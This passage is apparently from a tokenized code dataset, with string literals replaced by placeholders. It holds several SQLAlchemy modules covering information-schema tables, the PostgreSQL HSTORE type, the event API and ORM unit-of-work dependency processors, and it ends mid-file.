<EOL> ref_constraints = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , <EOL> key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) <EOL> views = Table ( "<STR_LIT>" , ischema , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , CoerceUnicode , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> Column ( "<STR_LIT>" , String , key = "<STR_LIT>" ) , <EOL> schema = "<STR_LIT>" ) </s>
<s> import re <EOL> from . base import ischema_names <EOL> from . array import ARRAY <EOL> from ... import types as sqltypes <EOL> from ... sql import functions as sqlfunc <EOL> from ... sql import operators <EOL> from ... import util <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> GETITEM = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True , <EOL> ) <EOL> HAS_KEY = operators . custom_op ( <EOL> "<STR_LIT:?>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> HAS_ALL = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> HAS_ANY = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> CONTAINS = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> CONTAINED_BY = operators . custom_op ( <EOL> "<STR_LIT>" , precedence = <NUM_LIT:15> , natural_self_precedent = True <EOL> ) <EOL> class HSTORE ( sqltypes . Indexable , sqltypes . Concatenable , sqltypes . TypeEngine ) : <EOL> """<STR_LIT>""" <EOL> __visit_name__ = '<STR_LIT>' <EOL> hashable = False <EOL> text_type = sqltypes . Text ( ) <EOL> def __init__ ( self , text_type = None ) : <EOL> """<STR_LIT>""" <EOL> if text_type is not None : <EOL> self . text_type = text_type <EOL> class Comparator ( <EOL> sqltypes . Indexable . Comparator , sqltypes . Concatenable . Comparator ) : <EOL> """<STR_LIT>""" <EOL> def has_key ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( HAS_KEY , other , result_type = sqltypes . Boolean ) <EOL> def has_all ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( HAS_ALL , other , result_type = sqltypes . Boolean ) <EOL> def has_any ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( HAS_ANY , other , result_type = sqltypes . Boolean ) <EOL> def contains ( self , other , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( CONTAINS , other , result_type = sqltypes . Boolean ) <EOL> def contained_by ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . operate ( <EOL> CONTAINED_BY , other , result_type = sqltypes . Boolean ) <EOL> def _setup_getitem ( self , index ) : <EOL> return GETITEM , index , self . type . text_type <EOL> def defined ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreDefinedFunction ( self . expr , key ) <EOL> def delete ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( key , dict ) : <EOL> key = _serialize_hstore ( key ) <EOL> return _HStoreDeleteFunction ( self . expr , key ) <EOL> def slice ( self , array ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreSliceFunction ( self . expr , array ) <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreKeysFunction ( self . expr ) <EOL> def vals ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreValsFunction ( self . expr ) <EOL> def array ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreArrayFunction ( self . expr ) <EOL> def matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> return _HStoreMatrixFunction ( self . expr ) <EOL> comparator_factory = Comparator <EOL> def bind_processor ( self , dialect ) : <EOL> if util . py2k : <EOL> encoding = dialect . encoding <EOL> def process ( value ) : <EOL> if isinstance ( value , dict ) : <EOL> return _serialize_hstore ( value ) . encode ( encoding ) <EOL> else : <EOL> return value <EOL> else : <EOL> def process ( value ) : <EOL> if isinstance ( value , dict ) : <EOL> return _serialize_hstore ( value ) <EOL> else : <EOL> return value <EOL> return process <EOL> def result_processor ( self , dialect , coltype ) : <EOL> if util . py2k : <EOL> encoding = dialect . encoding <EOL> def process ( value ) : <EOL> if value is not None : <EOL> return _parse_hstore ( value . decode ( encoding ) ) <EOL> else : <EOL> return value <EOL> else : <EOL> def process ( value ) : <EOL> if value is not None : <EOL> return _parse_hstore ( value ) <EOL> else : <EOL> return value <EOL> return process <EOL> ischema_names [ '<STR_LIT>' ] = HSTORE <EOL> class hstore ( sqlfunc . GenericFunction ) : <EOL> """<STR_LIT>""" <EOL> type = HSTORE <EOL> name = '<STR_LIT>' <EOL> class _HStoreDefinedFunction ( sqlfunc . GenericFunction ) : <EOL> type = sqltypes . Boolean <EOL> name = '<STR_LIT>' <EOL> class _HStoreDeleteFunction ( sqlfunc . GenericFunction ) : <EOL> type = HSTORE <EOL> name = '<STR_LIT>' <EOL> class _HStoreSliceFunction ( sqlfunc . GenericFunction ) : <EOL> type = HSTORE <EOL> name = '<STR_LIT>' <EOL> class _HStoreKeysFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> class _HStoreValsFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> class _HStoreArrayFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> class _HStoreMatrixFunction ( sqlfunc . GenericFunction ) : <EOL> type = ARRAY ( sqltypes . Text ) <EOL> name = '<STR_LIT>' <EOL> HSTORE_PAIR_RE = re . compile ( r"""<STR_LIT>""" , re . VERBOSE ) <EOL> HSTORE_DELIMITER_RE = re . compile ( r"""<STR_LIT>""" , re . VERBOSE ) <EOL> def _parse_error ( hstore_str , pos ) : <EOL> """<STR_LIT>""" <EOL> ctx = <NUM_LIT:20> <EOL> hslen = len ( hstore_str ) <EOL> parsed_tail = hstore_str [ max ( pos - ctx - <NUM_LIT:1> , <NUM_LIT:0> ) : min ( pos , hslen ) ] <EOL> residual = hstore_str [ min ( pos , hslen ) : min ( pos + ctx + <NUM_LIT:1> , hslen ) ] <EOL> if len ( parsed_tail ) > ctx : <EOL> parsed_tail = '<STR_LIT>' + parsed_tail [ <NUM_LIT:1> : ] <EOL> if len ( residual ) > ctx : <EOL> residual = residual [ : - <NUM_LIT:1> ] + '<STR_LIT>' <EOL> return "<STR_LIT>" % ( <EOL> parsed_tail , pos , residual ) <EOL> def _parse_hstore ( hstore_str ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> pos = <NUM_LIT:0> <EOL> pair_match = HSTORE_PAIR_RE . match ( hstore_str ) <EOL> while pair_match is not None : <EOL> key = pair_match . group ( '<STR_LIT:key>' ) . replace ( r'<STR_LIT>' , '<STR_LIT:">' ) . replace ( <EOL> "<STR_LIT>" , "<STR_LIT:\\>" ) <EOL> if pair_match . group ( '<STR_LIT>' ) : <EOL> value = None <EOL> else : <EOL> value = pair_match . group ( '<STR_LIT:value>' ) . replace ( <EOL> r'<STR_LIT>' , '<STR_LIT:">' ) . replace ( "<STR_LIT>" , "<STR_LIT:\\>" ) <EOL> result [ key ] = value <EOL> pos += pair_match . end ( ) <EOL> delim_match = HSTORE_DELIMITER_RE . match ( hstore_str [ pos : ] ) <EOL> if delim_match is not None : <EOL> pos += delim_match . end ( ) <EOL> pair_match = HSTORE_PAIR_RE . match ( hstore_str [ pos : ] ) <EOL> if pos != len ( hstore_str ) : <EOL> raise ValueError ( _parse_error ( hstore_str , pos ) ) <EOL> return result <EOL> def _serialize_hstore ( val ) : <EOL> """<STR_LIT>""" <EOL> def esc ( s , position ) : <EOL> if position == '<STR_LIT:value>' and s is None : <EOL> return '<STR_LIT>' <EOL> elif isinstance ( s , util . string_types ) : <EOL> return '<STR_LIT>' % s . replace ( "<STR_LIT:\\>" , "<STR_LIT>" ) . replace ( '<STR_LIT:">' , r'<STR_LIT>' ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( s , position ) ) <EOL> return '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % ( esc ( k , '<STR_LIT:key>' ) , esc ( v , '<STR_LIT:value>' ) ) <EOL> for k , v in val . items ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . . import util , exc <EOL> from . base import _registrars <EOL> from . registry import _EventKey <EOL> CANCEL = util . symbol ( '<STR_LIT>' ) <EOL> NO_RETVAL = util . symbol ( '<STR_LIT>' ) <EOL> def _event_key ( target , identifier , fn ) : <EOL> for evt_cls in _registrars [ identifier ] : <EOL> tgt = evt_cls . _accept_with ( target ) <EOL> if tgt is not None : <EOL> return _EventKey ( target , identifier , fn , tgt ) <EOL> else : <EOL> raise exc . InvalidRequestError ( "<STR_LIT>" % <EOL> ( identifier , target ) ) <EOL> def listen ( target , identifier , fn , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> _event_key ( target , identifier , fn ) . listen ( * args , ** kw ) <EOL> def listens_for ( target , identifier , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> def decorate ( fn ) : <EOL> listen ( target , identifier , fn , * args , ** kw ) <EOL> return fn <EOL> return decorate <EOL> def remove ( target , identifier , fn ) : <EOL> """<STR_LIT>""" <EOL> _event_key ( target , identifier , fn ) . remove ( ) <EOL> def contains ( target , identifier , fn ) : <EOL> """<STR_LIT>""" <EOL> return _event_key ( target , identifier , fn ) . contains ( ) </s>
<s> """<STR_LIT>""" <EOL> from . . import sql , util , exc as sa_exc <EOL> from . import attributes , exc , sync , unitofwork , util as mapperutil <EOL> from . interfaces import ONETOMANY , MANYTOONE , MANYTOMANY <EOL> class DependencyProcessor ( object ) : <EOL> def __init__ ( self , prop ) : <EOL> self . prop = prop <EOL> self . cascade = prop . cascade <EOL> self . mapper = prop . mapper <EOL> self . parent = prop . parent <EOL> self . secondary = prop . secondary <EOL> self . direction = prop . direction <EOL> self . post_update = prop . post_update <EOL> self . passive_deletes = prop . passive_deletes <EOL> self . passive_updates = prop . passive_updates <EOL> self . enable_typechecks = prop . enable_typechecks <EOL> if self . passive_deletes : <EOL> self . _passive_delete_flag = attributes . PASSIVE_NO_INITIALIZE <EOL> else : <EOL> self . _passive_delete_flag = attributes . PASSIVE_OFF <EOL> if self . passive_updates : <EOL> self . _passive_update_flag = attributes . PASSIVE_NO_INITIALIZE <EOL> else : <EOL> self . _passive_update_flag = attributes . PASSIVE_OFF <EOL> self . key = prop . key <EOL> if not self . prop . synchronize_pairs : <EOL> raise sa_exc . ArgumentError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> self . prop ) <EOL> @ classmethod <EOL> def from_relationship ( cls , prop ) : <EOL> return _direction_to_processor [ prop . direction ] ( prop ) <EOL> def hasparent ( self , state ) : <EOL> """<STR_LIT>""" <EOL> return self . parent . class_manager . get_impl ( self . key ) . hasparent ( state ) <EOL> def per_property_preprocessors ( self , uow ) : <EOL> """<STR_LIT>""" <EOL> uow . register_preprocessor ( self , True ) <EOL> def per_property_flush_actions ( self , uow ) : <EOL> after_save = unitofwork . ProcessAll ( uow , self , False , True ) <EOL> before_delete = unitofwork . ProcessAll ( uow , self , True , True ) <EOL> parent_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . parent . primary_base_mapper <EOL> ) <EOL> child_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . mapper . primary_base_mapper <EOL> ) <EOL> parent_deletes = unitofwork . DeleteAll ( <EOL> uow , <EOL> self . parent . primary_base_mapper <EOL> ) <EOL> child_deletes = unitofwork . DeleteAll ( <EOL> uow , <EOL> self . mapper . primary_base_mapper <EOL> ) <EOL> self . per_property_dependencies ( uow , <EOL> parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete <EOL> ) <EOL> def per_state_flush_actions ( self , uow , states , isdelete ) : <EOL> """<STR_LIT>""" <EOL> parent_base_mapper = self . parent . primary_base_mapper <EOL> child_base_mapper = self . mapper . primary_base_mapper <EOL> child_saves = unitofwork . SaveUpdateAll ( uow , child_base_mapper ) <EOL> child_deletes = unitofwork . DeleteAll ( uow , child_base_mapper ) <EOL> if isdelete : <EOL> before_delete = unitofwork . ProcessAll ( uow , self , True , True ) <EOL> before_delete . disabled = True <EOL> else : <EOL> after_save = unitofwork . ProcessAll ( uow , self , False , True ) <EOL> after_save . disabled = True <EOL> if child_saves not in uow . cycles : <EOL> assert child_deletes not in uow . cycles <EOL> child_actions = [ <EOL> ( child_saves , False ) , ( child_deletes , True ) <EOL> ] <EOL> child_in_cycles = False <EOL> else : <EOL> child_in_cycles = True <EOL> if not isdelete : <EOL> parent_saves = unitofwork . SaveUpdateAll ( <EOL> uow , <EOL> self . parent . base_mapper ) <EOL> parent_deletes = before_delete = None <EOL> if parent_saves in uow . cycles : <EOL> parent_in_cycles = True <EOL> else : <EOL> parent_deletes = unitofwork . DeleteAll ( <EOL> uow , <EOL> self . parent . base_mapper ) <EOL> parent_saves = after_save = None <EOL> if parent_deletes in uow . cycles : <EOL> parent_in_cycles = True <EOL> for state in states : <EOL> sum_ = state . manager [ self . key ] . impl . get_all_pending ( <EOL> state , state . dict , <EOL> self . _passive_delete_flag <EOL> if isdelete <EOL> else attributes . PASSIVE_NO_INITIALIZE ) <EOL> if not sum_ : <EOL> continue <EOL> if isdelete : <EOL> before_delete = unitofwork . ProcessState ( uow , <EOL> self , True , state ) <EOL> if parent_in_cycles : <EOL> parent_deletes = unitofwork . DeleteState ( <EOL> uow , <EOL> state , <EOL> parent_base_mapper ) <EOL> else : <EOL> after_save = unitofwork . ProcessState ( uow , self , False , state ) <EOL> if parent_in_cycles : <EOL> parent_saves = unitofwork . SaveUpdateState ( <EOL> uow , <EOL> state , <EOL> parent_base_mapper ) <EOL> if child_in_cycles : <EOL> child_actions = [ ] <EOL> for child_state , child in sum_ : <EOL> if child_state not in uow . states : <EOL> child_action = ( None , None ) <EOL> else : <EOL> ( deleted , listonly ) = uow . states [ child_state ] <EOL> if deleted : <EOL> child_action = ( <EOL> unitofwork . DeleteState ( <EOL> uow , child_state , <EOL> child_base_mapper ) , <EOL> True ) <EOL> else : <EOL> child_action = ( <EOL> unitofwork . SaveUpdateState ( <EOL> uow , child_state , <EOL> child_base_mapper ) , <EOL> False ) <EOL> child_actions . append ( child_action ) <EOL> for child_action , childisdelete in child_actions : <EOL> self . per_state_dependencies ( uow , parent_saves , <EOL> parent_deletes , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> return False <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> return False <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> pass <EOL> def process_saves ( self , uowcommit , states ) : <EOL> pass <EOL> def prop_has_changes ( self , uowcommit , states , isdelete ) : <EOL> if not isdelete or self . passive_deletes : <EOL> passive = attributes . PASSIVE_NO_INITIALIZE <EOL> elif self . direction is MANYTOONE : <EOL> passive = attributes . PASSIVE_NO_FETCH_RELATED <EOL> else : <EOL> passive = attributes . PASSIVE_OFF <EOL> for s in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> s , <EOL> self . key , <EOL> passive ) <EOL> if history and not history . empty ( ) : <EOL> return True <EOL> else : <EOL> return states and not self . prop . _is_self_referential and self . mapper in uowcommit . mappers <EOL> def _verify_canload ( self , state ) : <EOL> if self . prop . uselist and state is None : <EOL> raise exc . FlushError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( self . prop , ) ) <EOL> elif state is not None and not self . mapper . _canload ( <EOL> state , allow_subtypes = not self . enable_typechecks ) : <EOL> if self . mapper . _canload ( state , allow_subtypes = True ) : <EOL> raise exc . FlushError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % { <EOL> '<STR_LIT:x>' : state . class_ , <EOL> '<STR_LIT:y>' : self . prop , <EOL> '<STR_LIT:z>' : self . mapper . class_ , <EOL> '<STR_LIT>' : self . mapper , <EOL> } ) <EOL> else : <EOL> raise exc . FlushError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT:x>' : state . class_ , <EOL> '<STR_LIT:y>' : self . prop , <EOL> '<STR_LIT:z>' : self . mapper . class_ , <EOL> } ) <EOL> def _synchronize ( self , state , child , associationrow , <EOL> clearkeys , uowcommit ) : <EOL> raise NotImplementedError ( ) <EOL> def _get_reversed_processed_set ( self , uow ) : <EOL> if not self . prop . _reverse_property : <EOL> return None <EOL> process_key = tuple ( sorted ( <EOL> [ self . key ] + <EOL> [ p . key for p in self . prop . _reverse_property ] <EOL> ) ) <EOL> return uow . memo ( <EOL> ( '<STR_LIT>' , process_key ) , <EOL> set <EOL> ) <EOL> def _post_update ( self , state , uowcommit , related , is_m2o_delete = False ) : <EOL> for x in related : <EOL> if not is_m2o_delete or x is not None : <EOL> uowcommit . issue_post_update ( <EOL> state , <EOL> [ r for l , r in self . prop . synchronize_pairs ] <EOL> ) <EOL> break <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> raise NotImplementedError ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , self . prop ) <EOL> class OneToManyDP ( DependencyProcessor ) : <EOL> def per_property_dependencies ( self , uow , parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete , <EOL> ) : <EOL> if self . post_update : <EOL> child_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> False ) <EOL> child_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> True ) <EOL> uow . dependencies . update ( [ <EOL> ( child_saves , after_save ) , <EOL> ( parent_saves , after_save ) , <EOL> ( after_save , child_post_updates ) , <EOL> ( before_delete , child_pre_updates ) , <EOL> ( child_pre_updates , parent_deletes ) , <EOL> ( child_pre_updates , child_deletes ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( parent_saves , after_save ) , <EOL> ( after_save , child_saves ) , <EOL> ( after_save , child_deletes ) , <EOL> ( child_saves , parent_deletes ) , <EOL> ( child_deletes , parent_deletes ) , <EOL> ( before_delete , child_saves ) , <EOL> ( before_delete , child_deletes ) , <EOL> ] ) <EOL> def per_state_dependencies ( self , uow , <EOL> save_parent , <EOL> delete_parent , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) : <EOL> if self . post_update : <EOL> child_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> False ) <EOL> child_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . mapper . primary_base_mapper , <EOL> True ) <EOL> if not isdelete : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( child_action , after_save ) , <EOL> ( after_save , child_post_updates ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( child_action , after_save ) , <EOL> ( after_save , child_post_updates ) , <EOL> ] ) <EOL> else : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_pre_updates ) , <EOL> ( child_pre_updates , delete_parent ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_pre_updates ) , <EOL> ( child_pre_updates , delete_parent ) , <EOL> ] ) <EOL> elif not isdelete : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( after_save , child_action ) , <EOL> ( save_parent , child_action ) <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , child_action ) , <EOL> ( child_action , delete_parent ) <EOL> ] ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> should_null_fks = not self . cascade . delete and not self . passive_deletes == '<STR_LIT:all>' <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if child is not None and self . hasparent ( child ) is False : <EOL> if self . cascade . delete_orphan : <EOL> uowcommit . register_object ( child , isdelete = True ) <EOL> else : <EOL> uowcommit . register_object ( child ) <EOL> if should_null_fks : <EOL> for child in history . unchanged : <EOL> if child is not None : <EOL> uowcommit . register_object ( <EOL> child , operation = "<STR_LIT>" , prop = self . prop ) <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> children_added = uowcommit . memo ( ( '<STR_LIT>' , self ) , set ) <EOL> for state in states : <EOL> pks_changed = self . _pks_changed ( uowcommit , state ) <EOL> if not pks_changed or self . passive_updates : <EOL> passive = attributes . PASSIVE_NO_INITIALIZE <EOL> else : <EOL> passive = attributes . PASSIVE_OFF <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> passive ) <EOL> if history : <EOL> for child in history . added : <EOL> if child is not None : <EOL> uowcommit . register_object ( child , cancel_delete = True , <EOL> operation = "<STR_LIT>" , <EOL> prop = self . prop ) <EOL> children_added . update ( history . added ) <EOL> for child in history . deleted : <EOL> if not self . cascade . delete_orphan : <EOL> uowcommit . register_object ( child , isdelete = False , <EOL> operation = '<STR_LIT>' , <EOL> prop = self . prop ) <EOL> elif self . hasparent ( child ) is False : <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> for c , m , st_ , dct_ in self . mapper . cascade_iterator ( <EOL> '<STR_LIT>' , child ) : <EOL> uowcommit . register_object ( <EOL> st_ , <EOL> isdelete = True ) <EOL> if pks_changed : <EOL> if history : <EOL> for child in history . unchanged : <EOL> if child is not None : <EOL> uowcommit . register_object ( <EOL> child , <EOL> False , <EOL> self . passive_updates , <EOL> operation = "<STR_LIT>" , <EOL> prop = self . prop ) <EOL> def process_deletes ( self , uowcommit , states ) : <EOL> if self . post_update or not self . passive_deletes == '<STR_LIT:all>' : <EOL> children_added = uowcommit . memo ( ( '<STR_LIT>' , self ) , set ) <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if child is not None and self . hasparent ( child ) is False : <EOL> self . _synchronize ( <EOL> state , <EOL> child , <EOL> None , True , <EOL> uowcommit , False ) <EOL> if self . post_update and child : <EOL> self . _post_update ( child , uowcommit , [ state ] ) <EOL> if self . post_update or not self . cascade . delete : <EOL> for child in set ( history . unchanged ) . difference ( children_added ) : <EOL> if child is not None : <EOL> self . _synchronize ( <EOL> state , <EOL> child , <EOL> None , True , <EOL> uowcommit , False ) <EOL> if self . post_update and child : <EOL> self . _post_update ( child , <EOL> uowcommit , <EOL> [ state ] ) <EOL> def process_saves ( self , uowcommit , states ) : <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> attributes . PASSIVE_NO_INITIALIZE ) <EOL> if history : <EOL> for child in history . added : <EOL> self . _synchronize ( state , child , None , <EOL> False , uowcommit , False ) <EOL> if child is not None and self . post_update : <EOL> self . _post_update ( child , uowcommit , [ state ] ) <EOL> for child in history . deleted : <EOL> if not self . cascade . delete_orphan and not self . hasparent ( child ) : <EOL> self . _synchronize ( state , child , None , True , <EOL> uowcommit , False ) <EOL> if self . _pks_changed ( uowcommit , state ) : <EOL> for child in history . unchanged : <EOL> self . _synchronize ( state , child , None , <EOL> False , uowcommit , True ) <EOL> def _synchronize ( self , state , child , <EOL> associationrow , clearkeys , uowcommit , <EOL> pks_changed ) : <EOL> source = state <EOL> dest = child <EOL> self . _verify_canload ( child ) <EOL> if dest is None or ( not self . post_update and uowcommit . is_deleted ( dest ) ) : <EOL> return <EOL> if clearkeys : <EOL> sync . clear ( dest , self . mapper , self . prop . synchronize_pairs ) <EOL> else : <EOL> sync . populate ( source , self . parent , dest , self . mapper , <EOL> self . prop . synchronize_pairs , uowcommit , <EOL> self . passive_updates and pks_changed ) <EOL> def _pks_changed ( self , uowcommit , state ) : <EOL> return sync . source_modified ( <EOL> uowcommit , <EOL> state , <EOL> self . parent , <EOL> self . prop . synchronize_pairs ) <EOL> class ManyToOneDP ( DependencyProcessor ) : <EOL> def __init__ ( self , prop ) : <EOL> DependencyProcessor . __init__ ( self , prop ) <EOL> self . mapper . _dependency_processors . append ( DetectKeySwitch ( prop ) ) <EOL> def per_property_dependencies ( self , uow , <EOL> parent_saves , <EOL> child_saves , <EOL> parent_deletes , <EOL> child_deletes , <EOL> after_save , <EOL> before_delete ) : <EOL> if self . post_update : <EOL> parent_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> False ) <EOL> parent_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> True ) <EOL> uow . dependencies . update ( [ <EOL> ( child_saves , after_save ) , <EOL> ( parent_saves , after_save ) , <EOL> ( after_save , parent_post_updates ) , <EOL> ( after_save , parent_pre_updates ) , <EOL> ( before_delete , parent_pre_updates ) , <EOL> ( parent_pre_updates , child_deletes ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( child_saves , after_save ) , <EOL> ( after_save , parent_saves ) , <EOL> ( parent_saves , child_deletes ) , <EOL> ( parent_deletes , child_deletes ) <EOL> ] ) <EOL> def per_state_dependencies ( self , uow , <EOL> save_parent , <EOL> delete_parent , <EOL> child_action , <EOL> after_save , before_delete , <EOL> isdelete , childisdelete ) : <EOL> if self . post_update : <EOL> if not isdelete : <EOL> parent_post_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> False ) <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( after_save , parent_post_updates ) , <EOL> ( parent_post_updates , child_action ) <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( save_parent , after_save ) , <EOL> ( child_action , after_save ) , <EOL> ( after_save , parent_post_updates ) <EOL> ] ) <EOL> else : <EOL> parent_pre_updates = unitofwork . IssuePostUpdate ( <EOL> uow , <EOL> self . parent . primary_base_mapper , <EOL> True ) <EOL> uow . dependencies . update ( [ <EOL> ( before_delete , parent_pre_updates ) , <EOL> ( parent_pre_updates , delete_parent ) , <EOL> ( parent_pre_updates , child_action ) <EOL> ] ) <EOL> elif not isdelete : <EOL> if not childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( child_action , after_save ) , <EOL> ( after_save , save_parent ) , <EOL> ] ) <EOL> else : <EOL> uow . dependencies . update ( [ <EOL> ( after_save , save_parent ) , <EOL> ] ) <EOL> else : <EOL> if childisdelete : <EOL> uow . dependencies . update ( [ <EOL> ( delete_parent , child_action ) <EOL> ] ) <EOL> def presort_deletes ( self , uowcommit , states ) : <EOL> if self . cascade . delete or self . cascade . delete_orphan : <EOL> for state in states : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> if self . cascade . delete_orphan : <EOL> todelete = history . sum ( ) <EOL> else : <EOL> todelete = history . non_deleted ( ) <EOL> for child in todelete : <EOL> if child is None : <EOL> continue <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" , prop = self . prop ) <EOL> t = self . mapper . cascade_iterator ( '<STR_LIT>' , child ) <EOL> for c , m , st_ , dct_ in t : <EOL> uowcommit . register_object ( <EOL> st_ , isdelete = True ) <EOL> def presort_saves ( self , uowcommit , states ) : <EOL> for state in states : <EOL> uowcommit . register_object ( state , operation = "<STR_LIT>" , prop = self . prop ) <EOL> if self . cascade . delete_orphan : <EOL> history = uowcommit . get_attribute_history ( <EOL> state , <EOL> self . key , <EOL> self . _passive_delete_flag ) <EOL> if history : <EOL> for child in history . deleted : <EOL> if self . hasparent ( child ) is False : <EOL> uowcommit . register_object ( <EOL> child , isdelete = True , <EOL> operation = "<STR_LIT>" 